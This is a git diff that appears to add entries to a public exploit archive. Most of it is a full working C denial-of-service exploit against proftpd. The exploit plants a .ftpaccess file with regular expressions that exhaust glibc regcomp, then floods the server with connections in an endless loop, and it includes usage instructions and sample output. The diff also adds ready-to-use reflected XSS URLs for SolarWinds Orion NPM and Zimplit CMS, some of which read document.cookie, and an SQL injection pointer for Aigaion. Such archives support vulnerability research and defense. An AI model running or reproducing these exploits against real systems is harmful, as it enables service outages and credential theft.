diff --git a/files.csv b/files.csv index 4c0cfae81..f66d446d6 100755 --- a/files.csv +++ b/files.csv @@ -31570,3 +31570,8 @@ id,file,description,date,author,platform,type,port 35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0 35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0 +35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0 +35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0 +35063,platforms/php/webapps/35063.txt,"Zimplit CMS zimplit.php file Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0 +35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0 +35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 Multiple Cross Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0 diff --git a/platforms/asp/webapps/35065.txt b/platforms/asp/webapps/35065.txt new file mode 100755 index 000000000..2ee43951c --- /dev/null +++ b/platforms/asp/webapps/35065.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/45257/info + +SolarWinds Orion NPM is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +SolarWinds Orion Network Performance Monitor (NPM) 10.1 is vulnerable; other versions may also be affected. + +http://www.example.com/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813f-231270=0225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E + +http://www.example.com/Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E + +http://www.example.com/Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Ealert%28%2=7test%27%29%3C/script%3E&I:100&view=InterfaceDetails + +http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yesterday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColor=&ResourceID=57&ShowTrend=True&ReturnTo= diff --git a/platforms/linux/dos/35061.c b/platforms/linux/dos/35061.c new file mode 100755 index 000000000..2811b8431 --- /dev/null +++ b/platforms/linux/dos/35061.c @@ -0,0 +1,276 @@ +source: http://www.securityfocus.com/bid/45233/info + +GNU glibc is prone to a denial-of-service vulnerability due to stack exhaustion. + +Successful exploits will allow attackers to make the affected computer unresponsive, denying service to legitimate users. + +This issue affects unknown versions of the glibc library. This BID will be updated when more details become available. + +#include +#include +#include +#include +#include +#include +#include + +/* + +proftpd multiple exploit for VU#912279 (only with GNU libc/regcomp(3)) +by Maksymilian Arciemowicz + +References: +http://www.kb.cert.org/vuls/id/912279 +http://cxib.net/ +http://securityreason.com/ + +Tested: +Ubuntu + proftpd + +This exploit need writing privileges to create .ftpaccess file with vulnerable regular expressions. Works well only under Linux + +172.16.124.1 - NetBSD 5.1 (HACKER) +172.16.124.134 - Ubuntu 10.10 (TARGET) + +PoC1: +.exitcx@cx64:~/advs/done$ ./reg1 172.16.124.134 21 cx password 172.16.124.1 1 + +Try create .ftpaccess with HideFiles "(\.ftpaccess|(.*{10,}{10,}{10,}{10,}))$" +... +send: stat . + +send: USER cx +PASS password + +send: stat . + +Can`t connect +.exit +cx@cx64:~/advs/done$ telnet 172.16.124.134 21 +Trying 172.16.124.134... +telnet: Unable to connect to remote host: Connection refused + +Resume: +- created .ftpaccess file, and connect<=>disconnect +It will create a lot of proftpd children with 100% CPU usage. + + +If we try + +./reg1 172.16.124.134 21 cx password 172.16.124.1 3 + +any proftpd children will generate memory exhausion + +Options: +1 - cpu resource exhausion +2 - crash (recursion) +3 - memory resource exhausion +4 - possible crash with (ulimit {-v|-m}) + +*/ + + +char expl0[]="HideFiles \"(\\.ftpaccess|(.*{10,}{10,}{10,}{10,}))$\""; //CVE-2010-4052 Long execution +char expl1[]="HideFiles \"(\\.ftpaccess|(.*{10,}{10,}{10,}{10,}{10,}))$\""; //CVE-2010-4051 Crash +char expl2[]="HideFiles \"(.*+++++++++++++++++++++++++++++(\\w+))\""; // memory exhausion +char expl3[]="HideFiles \"(.*++++++++++++++++++++++++++++++(\\w+))\""; // if virtual memory limited, crash + +int sendftp(int stream,char *what){ + if(-1==send(stream,what,strlen(what),0)) + printf("Can't send %s\n",what); + else + printf("send: %s\n",what); + + bzero(what,sizeof(what)); +} + +void readftp(int stream,int flag){ + if(flag==1) flag=MSG_DONTWAIT; + else flag=0; + char *readline=malloc(sizeof(char)*(4096+1)); + memset(readline,'\x00',(4096+1)); + if(recv(stream,readline,4096,flag)<1){ + printf("Can't read from stream\n"); + if(readline) free(readline); + close(stream); + exit(1); + } + else{ + if(readline) + write(1, readline, strlen(readline)); + fflush(stdout); + } + free(readline); +} + + +int attack(host,port,login,pass) +char *host,*port,*login,*pass; +{ + char buffer[1024]; // send ftp command buffor + int sockfd,n,error; + struct addrinfo hints; + struct addrinfo *res, *res0; + + memset(&hints, 0, sizeof(hints)); + hints.ai_family = PF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + error = getaddrinfo(host,port,&hints,&res0); + + if (error){ + errorcon: + printf("Can`t connect\n.exit"); + exit(1); + } + + if((sockfd=socket(res0->ai_family,res0->ai_socktype,res0->ai_protocol))<0) goto errorcon; + if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon; + + snprintf(buffer,1024,"USER %s\nPASS %s\n",login,pass); + sendftp(sockfd,buffer); + + bzero(buffer,1024); + snprintf(buffer,1024,"STAT .\n"); + sendftp(sockfd,buffer); + + freeaddrinfo(res0); + close(sockfd); +} + +void exploreip(char *ip, int (*ipnum)[4]){ + char *wsk; + + wsk=(char *)strtok(ip,"."); + (*ipnum)[0]=atoi(wsk); + wsk=(char *)strtok(NULL,"."); + (*ipnum)[1]=atoi(wsk); + wsk=(char *)strtok(NULL,"."); + (*ipnum)[2]=atoi(wsk); + wsk=(char *)strtok(NULL,"."); + (*ipnum)[3]=atoi(wsk); +} + + +int createexpl(host,port,login,pass,lip,pattern) + char *host,*port,*login,*pass,*lip,*pattern; +{ + char buffer[1024]; // send ftp command buffor + int ipnum[4]; + + int sockfd,n,error,sendstream,binarystream,sendport = (1024 + getpid()); + + struct addrinfo hints; + struct addrinfo *res, *res0; + struct sockaddr_in remo, loca; + + int len = sizeof(remo); + + memset(&hints, 0, sizeof(hints)); + hints.ai_family = PF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + error = getaddrinfo(host,port,&hints,&res0); + + if (error){ + errorcon: + + if(sendstream) close(sendstream); + printf("Can`t connect\n.exit"); + exit(1); + } + + if((sockfd=socket(res0->ai_family,res0->ai_socktype, res0->ai_protocol))<0) goto errorcon; + if(-1==connect(sockfd,res0->ai_addr,res0->ai_addrlen)) goto errorcon; + + readftp(sockfd,1024); + snprintf(buffer,1024,"USER %s\nPASS %s\n",login,pass); + sendftp(sockfd,buffer); + readftp(sockfd,1024); + readftp(sockfd,1024); + + exploreip(lip,&ipnum); + snprintf(buffer,1024,"TYPE I\nPORT %d,%d,%d,%d,%d,%d\n",ipnum[0],ipnum[1],ipnum[2],ipnum[3],sendport/256,sendport%256); + sendftp(sockfd,buffer); + readftp(sockfd,1024); + + bzero(&loca, sizeof(loca)); + loca.sin_family = AF_INET; + loca.sin_port=htons(sendport); + loca.sin_addr.s_addr = htonl(INADDR_ANY); + + if((sendstream=socket(AF_INET, SOCK_STREAM,0))<0) goto errorcon; + if((bind(sendstream, (struct sockaddr *) &loca, sizeof(loca)))<0) goto errorcon; + if(listen(sendstream, 10) < 0) goto errorcon; + + snprintf(buffer,1024,"STOR .ftpaccess\n"); + sendftp(sockfd,buffer); + + readftp(sockfd,1024); + + if((binarystream=accept(sendstream,(struct sockaddr *)&remo,&len)) < 0) goto errorcon; + write(binarystream,pattern,strlen(pattern)); + + freeaddrinfo(res0); + close(sendstream); + printf("Created .ftpaccess file with %s\nIt`s time to attack...\n",pattern); + sleep(3); + + return 0; +} + +void usage(){ + printf("Use: ./exploit target_ip port username password [your_ip] [option]\n\nCreate .ftpaccess with selected attack\noptions:\n1 - Long execution CVE-2010-4052\n2 - Recursion Crash CVE-2010-4051\n3 - Memory exhausion \n4 - Crash if virtual memory limited\n\n"); + exit(1); +} + +int main(int argc,char *argv[]) +{ + + char *login,*pass,*lip=NULL; + char logindef[]="anonymous",passdef[]="cx@127.0.0.1"; + + printf("This is exploit for ERE (GNU libc)\nby Maksymilian Arciemowicz\n\n"); + + if(argc<3) usage(); + + char *host=argv[1]; + char *port=argv[2]; + + if(4<=argc) login=argv[3]; + else login=logindef; + + if(5<=argc) pass=argv[4]; + else pass=passdef; + + if(6<=argc) lip=argv[5]; + + if(7<=argc) switch(atoi(argv[6])){ + case 1: + printf("Try create .ftpaccess with %s\n\n",expl0); + createexpl(host,port,login,pass,lip,expl0); + break; + + case 2: + printf("Try create .ftpaccess with %s\n\n",expl1); + createexpl(host,port,login,pass,lip,expl1); + break; + + case 3: + printf("Try create .ftpaccess with %s\n\n",expl2); + createexpl(host,port,login,pass,lip,expl2); + break; + + case 4: + printf("Try create .ftpaccess with %s\n\n",expl3); + createexpl(host,port,login,pass,lip,expl3); + break; + + default: + usage(); + break; + }; + + while(1) attack(host,port,login,pass); + + return 0; // never happen +} + diff --git a/platforms/php/webapps/35060.txt b/platforms/php/webapps/35060.txt new file mode 100755 index 000000000..9a682a07e --- /dev/null +++ b/platforms/php/webapps/35060.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45232/info + +Aigaion is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +Aigaion 1.3.4 is vulnerable; other versions may also be affected. + +http://www.example.com/Aigaion/ indexlight.php?page=export&type=single&format=RIS&ID=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35063.txt b/platforms/php/webapps/35063.txt new file mode 100755 index 000000000..0013a0ba8 --- /dev/null +++ b/platforms/php/webapps/35063.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45252/info + +Zimplit CMS is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/path/zimplit.php?action=load&file=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35064.txt b/platforms/php/webapps/35064.txt new file mode 100755 index 000000000..b1794e7f6 --- /dev/null +++ b/platforms/php/webapps/35064.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/45252/info + +Zimplit CMS is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/path/English_manual_version_2.php?client=c%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file